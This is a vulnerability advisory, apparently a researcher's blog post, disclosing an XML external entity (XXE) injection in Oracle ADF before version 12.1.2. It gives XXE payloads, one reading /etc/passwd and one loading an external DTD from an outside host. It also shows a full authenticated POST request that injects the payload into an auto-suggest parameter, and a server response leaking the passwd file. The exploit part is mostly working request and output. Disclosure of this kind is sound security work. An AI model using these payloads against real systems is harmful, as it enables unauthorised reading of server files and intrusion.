Oracle ADF < 12.1.2 – XML External Entity Injection (XXE) Vulnerability

Posted on Updated on

Product & Service Introduction;

In computing, Oracle Application Development Framework, usually called 
Oracle ADF, provides a commercial Java framework for building enterprise 
applications. It provides visual and declarative approaches to Java EE development. 
It supports rapid application development based on ready-to-use design patterns, 
metadata-driven and visual tools.

Exploitation Technique;

Remote, Authenticated

Affected Product;

Product; Oracle ADF < 12.1.2
http://www.oracle.com/technetwork/developer-tools/jdev/documentation/index.html
http://www.oracle.com/technetwork/developer-tools/jdev/documentation/1213nf-2222743.html

TECHNICAL DETAILS

Payloads;

<!DOCTYPE foo [<!ENTITY xxe52640 SYSTEM "file:///etc/passwd"> ]>
<!DOCTYPE%20m%20PUBLIC%20"-%2f%2fB%2fA%2fEN"%20"http%3a%2f%2fwww.runavea.com/xxe_test_uceka"><

Affected Parameter;

event.pt1:pt_it1

Request;

POST /***/?Adf-Window-Id=w2&Adf-Page-Id=4 HTTP/1.1
Host: www.hostname.com
Content-Length: 14972
Adf-Ads-Page-Id: 6
Origin: http:// www.hostname.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
Adf-Rich-Message: true
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
DNT: 1
Referer: http://www.hostname.com/***
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: telauraremember=false; JSESSIONID=B-VmvUq5YbSBb93IaheuiBOqZqu11xR6xJdkBUxDTFqSs1BTIoxn!-412599909

pt1:CURRENT_PAGE_NAME=HOME&pt1:pt_it1=%27&org.apache.myfaces.trinidad.faces.FORM=f1&Adf-Window-Id=w2&Adf-Page-Id=4&
javax.faces.ViewState=H4sIAAAAAAAAAOV9C5QcV3VgTc9P%2F59tWf7IaluyR5I1Peqej6SRZXt%2BkgZmJGVmJBsbM67uqp4uq7qqp%2Br1TI%
2B9MoZdPoGQ7DohQBDBGIOBNQnEC%2FE6CZ84QJYTO8F8A%
...kesildi... 
%%3D&event=pt1%3Apt_it1&event.pt1:pt_it1=<!DOCTYPE%20foo%20[<!ENTITY%20xxe52640%20SYSTEM%20"file%3a%2f%2f%2fetc%2fpasswd">%20]>
<m%20xmlns%3d"http%3a%2f%2foracle.com%2frichClient%2fcomm"><k%20v%3d"_custom"><b>1<%2fb><%2fk><k%20v%3d"submittedValue"><s>
'%26xxe52640%3b<%2fs><%2fk><k%20v%3d"emptyText"><s>Sonu%c3%a7%20bulunamad%c4%b1.<%2fs><%2fk><k%20v%3d"maxSuggestedItems"><n>-1
<%2fn><%2fk><k%20v%3d"requestId"><n>1<%2fn><%2fk><k%20v%3d"immediate"><b>1<%2fb><%2fk><k%20v%3d"type"><s>_autoSuggest<%2fs><%2fk>
<%2fm>&oracle.adf.view.rich.PROCESS=pt1%3Apt_it1

Response;

HTTP/1.1 200 OK
Cache-Control: no-cache
Cache-Control: no-store
Cache-Control: must-revalidate
…

…kesildi…
<?xml version="1.0" ?>
<partial-response><changes><update id="f1::postscript"><![CDATA[<span id="f1::postscript"><span id="f1::postscript:st"></span>
</span>]]></update><update id="javax.faces.ViewState"><![CDATA[H4sIAAAAAAAAAO29B2Acx3UwvHc4glVs6o2CREosIg/AoRIUJYEASEJEoQCQVLOhx
d0CWPHu9rC3RwBSJLe4x1WWbcV27LjJsdxiJe523GM7rnJvshM7juUex3JLLH/zZrbNzsw2HA6X/D9sDfe2zLz35rWZefPmLT+XVpV1ab+mz6TlkpydVdKFxWk5q5TThq
4W1ZycU4uGohflPHpeyqtZ2VC1Ynrc0CtZo6IrEvlLbJCkhZ
…kesildi… 
</eval><eval><![CDATA[AdfPage.PAGE.setPageStateId("4");AdfPage.PAGE.__setUserInactivityTimeout(600000);AdfPage.PAGE.__
recordSessionTimeout(1200000, 120000, "http://www.hostname.com:80/***");AdfPage.PAGE.clearMessages();
AdfPage.PAGE.clearSubtreeMessages('pt1:pt_it1');]]></eval><eval>AdfAutoSuggestBehavior.showAutoSuggestPopup('pt1:pt_it1',
'\'root:x:0:0:root:/root:/bin/bash\nbin:x:1:1:bin:/bin:/sbin/nologin\ndaemon:x:2:2:daemon:/sbin:/sbin/nologin\nadm:x:3:4:adm:
/var/adm:/sbin/nologin\nlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin\nsync:x:5:0:sync:/sbin:/bin/sync\nshutdown:x:6:0:shutdown:
/sbin:/sbin/shutdown\nhalt:x:7:0:halt:/sbin:/sbin/halt\nmail:x:8:12:mail:/var/spool/mail:/sbin/nologin\nnews:x:9:13:news:
/etc/news:\nuucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin\noperator:x:11:0:operator:/root:/sbin/nologin\ngames: **** 
default operator:/home/opc_op:/bin/sh\n',{'':'Sonu\xe7 bulunamad\u0131.'},false,-1,false,1)</eval></changes></partial-response>

POC Video;

Remote interaction via XML injection;
https://drive.google.com/open?id=0B-LWHbwdK3P9eGZ2SE1fazNOOWc

Credits & Authors;

Ugur Cihan Koc
@_uceka_
http://www.uceka.com

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s